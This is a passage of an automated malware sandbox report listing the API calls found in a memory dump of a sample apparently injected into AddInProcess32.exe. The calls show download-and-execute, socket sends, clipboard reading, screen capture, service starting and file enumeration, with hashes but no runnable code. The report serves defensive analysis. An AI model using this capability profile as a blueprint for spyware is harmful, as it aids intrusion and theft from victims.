  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
• FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
• FindClose.KERNEL32(00000000), ref: 004093FC
  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474F08,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404E38
  • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404E43
  • Part of subcall function 00404E26: CloseHandle.KERNELBASE(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404E4C
• FindClose.KERNEL32(00000000), ref: 004095F4
  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B60,00474EF0,00000000), ref: 00404B47
  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B60,00474EF0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
• String ID:
• API String ID: 1824512719-0
• Opcode ID: 3e41b3b17ee7b625e39a35955fea55242fe89250a83e2d42a4dc1e136830e029
• Instruction ID: 7a56ba3823c44b8d3dadbfeca74e3365e00ee059376cf1b582d15bdd70b30780
• Opcode Fuzzy Hash: 3e41b3b17ee7b625e39a35955fea55242fe89250a83e2d42a4dc1e136830e029
• Instruction Fuzzy Hash: 8AB19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59

APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
• OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
• CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
• StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
• CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
• CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ManagerStart
• String ID:
• API String ID: 276877138-0
• Opcode ID: ef3c0b856a1de7aadcfa328643844e0c859a8d8812f908c01dc675a5c8606680
• Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
• Opcode Fuzzy Hash: ef3c0b856a1de7aadcfa328643844e0c859a8d8812f908c01dc675a5c8606680
• Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579

APIs
• FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
• FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
Strings
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: File$Find$CreateFirstNext
• String ID: HSG$`XG$`XG
• API String ID: 341183262-3993355375
• Opcode ID: eb44e75cba824970a8d6236793f654e4149cf33d528ce4fb0e0c857079cc2993
• Instruction ID: 3e2b8d556a8fbdbb081ab446324185a4f3aab8361380fbf0113865ad31d0729a
• Opcode Fuzzy Hash: eb44e75cba824970a8d6236793f654e4149cf33d528ce4fb0e0c857079cc2993
• Instruction Fuzzy Hash: 588151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A

                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00452555
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 0045257E
                                                                                                  • GetACP.KERNEL32 ref: 00452593
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID: ACP$OCP
                                                                                                  • API String ID: 2299586839-711371036
APIs
• FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
• LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
• LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
• SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID: SETTINGS
• API String ID: 3473537107-594951305
APIs
• __EH_prolog.LIBCMT ref: 004096A5
• FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
• FindNextFileW.KERNEL32(00000000,?), ref: 00409746
• FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: Find$File$CloseFirstH_prologNext
• String ID:
• API String ID: 1157919129-0
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 00448301
• GetUserDefaultLCID.KERNEL32 ref: 0045279C
• IsValidCodePage.KERNEL32(00000000), ref: 004527F7
• IsValidLocale.KERNEL32(?,00000001), ref: 00452806
• GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
• GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0045286D
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
• String ID:
• API String ID: 745075371-0
APIs
• __EH_prolog.LIBCMT ref: 0040884C
• FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: Find$File$CloseException@8FirstH_prologNextThrow
• String ID:
• API String ID: 1771804793-0
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: FSE$FSE
• API String ID: 0-1826177230
APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: DownloadExecuteFileShell
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$open
• API String ID: 2825088817-2881483049
APIs
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
• FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: FileFind$FirstNextsend
• String ID: hPG$hPG
• API String ID: 4113138495-4177492676
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
  • Part of subcall function 004137AA: RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EF0,00000000), ref: 004137E1
  • Part of subcall function 004137AA: RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EF0,00000000,?,00408798,00000001), ref: 004137EC
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
  • Part of subcall function 004137AA: RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EF0,00000000), ref: 004137E1
  • Part of subcall function 004137AA: RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EF0,00000000,?,00408798,00000001), ref: 004137EC
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• IsValidCodePage.KERNEL32(00000000), ref: 00451E3A
• _wcschr.LIBVCRUNTIME ref: 00451ECA
• _wcschr.LIBVCRUNTIME ref: 00451ED8
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00451F7B
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
• String ID:
• API String ID: 4212172061-0
APIs
• _free.LIBCMT ref: 0044943D
  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
• GetTimeZoneInformation.KERNEL32 ref: 0044944F
• WideCharToMultiByte.KERNEL32(00000000,?,00472764,000000FF,?,0000003F,?,?), ref: 004494C7
• WideCharToMultiByte.KERNEL32(00000000,?,004727B8,000000FF,?,0000003F,?,?,?,00472764,000000FF,?,0000003F,?,?), ref: 004494F4
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
• String ID:
• API String ID: 806657224-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 00448301
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                  • String ID:
                                                                                                  • API String ID: 2829624132-0
                                                                                                  APIs
                                                                                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,00000000), ref: 004338DA
                                                                                                  • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                  • String ID:
                                                                                                  • API String ID: 1815803762-0
                                                                                                  APIs
                                                                                                  • OpenClipboard.USER32(00000000), ref: 0040B74C
                                                                                                  • GetClipboardData.USER32(0000000D), ref: 0040B758
                                                                                                  • CloseClipboard.USER32 ref: 0040B760
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Clipboard$CloseDataOpen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2058664381-0
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID: GetLocaleInfoEx
                                                                                                  • API String ID: 2299586839-2904428671
                                                                                                  APIs
                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 00448301
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                  • String ID:
                                                                                                  • API String ID: 1663032902-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                  • EnumSystemLocalesW.KERNEL32(00452143,00000001), ref: 0045208D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1084509184-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 2692324296-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                  • EnumSystemLocalesW.KERNEL32(00452393,00000001), ref: 00452102
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1084509184-0
                                                                                                  APIs
                                                                                                  • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: NameUser
                                                                                                  • String ID:
                                                                                                  • API String ID: 2645101109-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(?,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                                                  • EnumSystemLocalesW.KERNEL32(Function_0004843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 1272433827-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                  • EnumSystemLocalesW.KERNEL32(00451F27,00000001), ref: 00452007
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1084509184-0
                                                                                                  • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                  • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                                                                  • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                  • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                                                                  APIs
                                                                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EF0,00475A10,00474EF0,00000000,00474EF0,00000000,00474EF0,5.2.0 Pro), ref: 0040F920
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 2299586839-0
                                                                                                  • Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                                                                                  • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                                  • Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                                                                                  • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                                                  APIs
                                                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                                                    • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                                                  • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                                                  • GetIconInfo.USER32(?,?), ref: 00418FF8
                                                                                                  • DeleteObject.GDI32(?), ref: 00419027
                                                                                                  • DeleteObject.GDI32(?), ref: 00419034
                                                                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00660046), ref: 00419077
                                                                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                                                  • DeleteDC.GDI32(?), ref: 004191B7
                                                                                                  • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                                                  • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                                                  • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                                                  • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                                                  • GlobalFree.KERNEL32(?), ref: 00419283
                                                                                                  • DeleteDC.GDI32(?), ref: 00419293
                                                                                                  • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                                                  • String ID: DISPLAY
                                                                                                  • API String ID: 479521175-865373369
                                                                                                  • Opcode ID: a332c2859ef59da40decfcbeef2faf7b264db83c1a690ef57184ee4fa2b6b732
